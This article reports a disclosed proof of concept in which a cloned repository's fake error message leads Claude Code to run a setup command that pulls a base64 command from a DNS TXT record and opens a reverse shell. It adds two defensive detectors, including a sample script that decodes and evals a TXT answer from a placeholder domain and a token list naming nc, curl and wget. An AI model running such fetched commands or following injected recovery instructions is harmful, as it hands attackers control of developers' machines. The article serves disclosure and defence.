Mozilla's 0DIN security research lab showed that a clean GitHub repo and a routine DNS lookup can turn Claude Code's helpfulness into a remote access backdoor on a developer's machine.
The exploit doesn't live in the code. It lives in the agent's willingness to run a command a developer clearly meant to run themselves.
Mozilla's 0DIN researchers Andre Hall and Miller Engelbrecht disclosed a proof-of-concept this week showing how Anthropic's Claude Code can be talked into opening a reverse shell on a developer's machine, with no malicious payload present in the cloned repository. The instruction arrives later, fetched from a DNS TXT record no static scanner inspects, and is delivered to the agent as if it were the user's own recovery command.
The DNS TXT record carries a base64-encoded shell command that only resolves when the agent runs its startup check. Static code review, software composition analysis, dependency scanners, and antivirus tools all see a clean repository containing a benign Markdown README and a fake monitoring tool called "Axiom." The dangerous instruction exists only at runtime, once the record is fetched and decoded into a reverse shell. As BleepingComputer reports, every individual step looks unremarkable on its own.
The attack begins with a developer cloning a repository that looks like any other monitoring project. The README explains how to install "Axiom," and the developer runs the tool without initializing it. The tool returns an error message instructing the user to run a specific setup command to recover. That message reads like standard troubleshooting documentation.
Claude Code, asked to help, follows the written instruction automatically. The setup command triggers a hidden shell script that queries a DNS TXT record controlled by the attacker, decodes the base64 response, and executes a reverse shell that connects back to the attacker's server. The TechRadar writeup notes that once inside, the attacker can plant an SSH key or schedule a hidden cron job for persistence. A single repository link shared in a job posting, chat message, or README could compromise every developer who clones it.
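The chain the article describes (DNS TXT lookup, base64 decode, execution) is invisible to scanners that only look at dependencies and binaries, but the setup script itself has to contain the lookup and the interpreter call. The following added example, which is not 0DIN's code and not part of any scanner named above, is a heuristic linter a defender can run over shell scripts in a freshly cloned repository. It flags a line where a DNS TXT answer is piped straight into an interpreter, and it tracks variables assigned from a lookup so that a two-step `CFG=$(dig ...)` / `eval "$CMD"` pattern is also caught. The sample script, the `example.invalid` domain and the regex patterns are constructed for this example and are assumptions to be tuned for your environment.

```python
import re
from dataclasses import dataclass

# Heuristic patterns for the three stages of the chain: a DNS TXT lookup,
# a decoder, and an interpreter that executes the result. Constructed for
# this example; extend them for the tooling used in your environment.
DNS_TXT_LOOKUP = re.compile(
    r"\b(?:dig|nslookup|host|drill|resolvectl\s+query)\b[^|;&\n]*\bTXT\b", re.I)
DECODER = re.compile(
    r"\b(?:base64\s+(?:-d|--decode)|xxd\s+-r|openssl\s+(?:enc\s+)?-d)\b")
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh|dash|ksh)\b")
EVAL_SINK = re.compile(r"(?:^|[\s;&|])(?:eval|source)\s|(?:^|[\s;&|])\.\s")
ASSIGNMENT = re.compile(r"^\s*(?:export\s+)?([A-Za-z_]\w*)=")


@dataclass
class Finding:
    line_no: int
    severity: str  # "high", "medium" or "low"
    reason: str
    text: str


def _uses_var(line: str, name: str) -> bool:
    """True if the line expands shell variable `name` ($NAME or ${NAME})."""
    return re.search(r"\$\{?" + re.escape(name) + r"\b", line) is not None


def scan_shell_script(script: str) -> list[Finding]:
    """Return findings for lines where a DNS TXT answer can reach an interpreter."""
    findings: list[Finding] = []
    tainted: set[str] = set()  # variables whose value came from a DNS TXT answer
    for n, line in enumerate(script.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        has_lookup = DNS_TXT_LOOKUP.search(line) is not None
        has_decoder = DECODER.search(line) is not None
        has_sink = bool(PIPE_TO_INTERPRETER.search(line) or EVAL_SINK.search(line))
        tainted_used = any(_uses_var(line, v) for v in tainted)

        # Propagate taint: anything assigned from a lookup, or from a tainted
        # variable, is itself DNS-derived data.
        m = ASSIGNMENT.match(line)
        if m and (has_lookup or tainted_used):
            tainted.add(m.group(1))

        stripped = line.strip()
        if has_lookup and has_sink:
            findings.append(Finding(n, "high",
                "DNS TXT answer piped straight into an interpreter", stripped))
        elif tainted_used and has_sink:
            findings.append(Finding(n, "high",
                "variable holding a DNS TXT answer reaches an interpreter", stripped))
        elif (has_lookup or tainted_used) and has_decoder:
            findings.append(Finding(n, "medium",
                "DNS TXT answer is decoded; check where the result goes", stripped))
        elif has_lookup:
            findings.append(Finding(n, "low",
                "DNS TXT lookup in an install/setup script", stripped))
    return findings


# Constructed sample mirroring the described chain in its two-step form.
# The domain is a placeholder; no real record is involved.
SAMPLE_SCRIPT = """\
#!/bin/sh
# Constructed sample for the scanner; the domain is a placeholder, not a real record.
STATUS=$(dig +short TXT status.example.invalid)
echo "axiom status: $STATUS"
CFG=$(dig +short TXT cfg.example.invalid | tr -d '"')
CMD=$(printf '%s' "$CFG" | base64 -d)
eval "$CMD"
"""

if __name__ == "__main__":
    for f in scan_shell_script(SAMPLE_SCRIPT):
        print(f"line {f.line_no} [{f.severity}] {f.reason}: {f.text}")
```

Run it as a pre-commit or clone-time hook over every `*.sh` file and over the commands a README tells the agent to execute. A "high" finding does not prove malice, but it is exactly the runtime-resolved-command shape that the static tools named above do not see, so it is a sensible point to pause the agent and ask a human.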
Conventional security assumes the threat lives in the artifact. Source code, dependencies, build scripts, and binary payloads can all be inspected before execution. The 0DIN PoC sidesteps that assumption by leaving nothing suspicious to inspect. As HelpNetSecurity reports, the malicious instruction is not part of the repository at all; it is delivered through a channel that network monitoring registers as ordinary domain name resolution.
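Network monitoring treats the lookup as ordinary resolution because it looks at the query, not at what the TXT answer decodes to. The added example below is a detection rule written for this article, not 0DIN's tooling and not a rule from any product named here, that runs over resolver or passive-DNS logs and alerts when a TXT answer is a base64 string that decodes to printable, shell-like text. It deliberately ignores the two common base64-bearing TXT records that would otherwise be false positives: a DKIM key, whose `p=` field is not a bare base64 string, and a record whose base64 decodes to binary rather than a command. The log format, hostnames, domains and the `SHELL_HINTS` token list are assumptions constructed for this example.

```python
import base64
import re
import string
from typing import Optional

# Assumed log format (constructed): one answer per line, key=value fields,
# rdata quoted. Adapt the regex to your resolver's actual output.
LOG_LINE = re.compile(
    r'(?P<ts>\S+) host=(?P<host>\S+) qname=(?P<qname>\S+) '
    r'qtype=(?P<qtype>\S+) rdata="(?P<rdata>.*)"$')
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# Tokens that make decoded text look like a command rather than a key or a blob.
SHELL_HINTS = re.compile(
    r"^#!|\b(?:sh|bash|zsh|python3?|perl|curl|wget|nc|ncat|exec|eval|chmod|crontab)\b|[|;&`$]")
PRINTABLE = set(string.printable)


def decode_txt_payload(rdata: str) -> Optional[bytes]:
    """Return the decoded bytes if the whole TXT answer is one base64 string."""
    # Long TXT answers are split into several quoted 255-byte strings; join them.
    joined = re.sub(r'["\s]', "", rdata)
    if len(joined) < 8 or len(joined) % 4 or not B64_CHARS.match(joined):
        return None
    try:
        return base64.b64decode(joined, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def looks_like_shell(blob: bytes) -> bool:
    """True for printable ASCII that carries shell tokens or metacharacters."""
    try:
        text = blob.decode("ascii")
    except UnicodeDecodeError:
        return False
    if not text or sum(c in PRINTABLE for c in text) / len(text) < 0.95:
        return False
    return SHELL_HINTS.search(text) is not None


def analyze_dns_log(lines) -> list:
    """Emit one alert per TXT answer whose base64 content decodes to shell-like text."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m or m["qtype"] != "TXT":
            continue
        blob = decode_txt_payload(m["rdata"])
        if blob is not None and looks_like_shell(blob):
            alerts.append({"rule": "base64-shell-in-txt", "host": m["host"],
                           "qname": m["qname"], "decoded": blob.decode("ascii")})
    return alerts


# Constructed sample log. The shell-like payload is a harmless command chosen
# to exercise the rule; the binary blob stands in for a key-style TXT record.
_SHELLISH = base64.b64encode(b"sh -c 'id; uname -a'").decode()
_BINARY = base64.b64encode(bytes(range(64))).decode()
SAMPLE_LOG = [
    '2025-05-02T10:14:03Z host=dev-laptop-17 qname=example.invalid qtype=TXT '
    'rdata="v=spf1 include:_spf.example.invalid ~all"',
    '2025-05-02T10:14:05Z host=dev-laptop-17 qname=sel._domainkey.example.invalid '
    'qtype=TXT rdata="v=DKIM1; k=rsa; p=' + _BINARY + '"',
    '2025-05-02T10:14:07Z host=dev-laptop-17 qname=_verify.example.invalid '
    'qtype=TXT rdata="' + _BINARY + '"',
    '2025-05-02T10:14:09Z host=dev-laptop-17 qname=cfg.example.invalid '
    'qtype=TXT rdata="' + _SHELLISH + '"',
    '2025-05-02T10:14:10Z host=dev-laptop-17 qname=cfg.example.invalid '
    'qtype=A rdata="203.0.113.7"',
]

if __name__ == "__main__":
    for alert in analyze_dns_log(SAMPLE_LOG):
        print(alert)
```

The rule is content-based, so it fires regardless of which domain is queried; pairing it with a second condition, such as "TXT query from a developer workstation to a zone not on an allowlist", cuts the remaining noise and gives the SOC a host to isolate rather than a domain to block after the fact.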
This is the architectural failure the researchers are flagging. Tool-using agentic coders combine three properties: broad shell and filesystem access, a permissive execution stance toward commands that look routine, and an instruction-following mandate that treats anything resembling a developer request as legitimate. Helpfulness is the attack surface.
Constraining the agent's helpfulness undermines its value proposition. Leaving it permissive opens every instruction channel the agent reads at runtime — DNS, environment variables, log files, error messages, and external documentation — as a candidate injection surface. The core tension is that both directions destroy the developer experience that drives adoption.
DevOps.com reports that the disclosure is a warning about prompt-injection risk more broadly. The mechanism class is not specific to one tool's parser; it is a property of agents that read untrusted text and act on it with shell privileges. As Developer-Tech.com notes, the practical question is how coding-agent vendors will sandbox the execution layer without breaking the developer experience that drives adoption.
The 0DIN PoC targets Claude Code specifically, with its particular combination of permissive shell execution and runtime DNS resolution. Whether other coding agents, including Cursor, Codex, and Copilot's agent mode, share the same DNS-TXT indirect-injection surface is not verified in the current disclosure. The mechanism class generalizes, but the specific channel does not necessarily transfer. Developers running any tool-using agent against untrusted repositories should treat the entire developer workstation as compromised the moment an unfamiliar command executes, regardless of which agent performed the execution.
The broader pattern, as Vibegraveyard summarizes it, is that the agent's helpfulness and the attacker's instructions now share the same trust boundary. Until that boundary is redrawn, cloning an interesting-looking repository is no longer a code-review problem. It is a host-trust problem.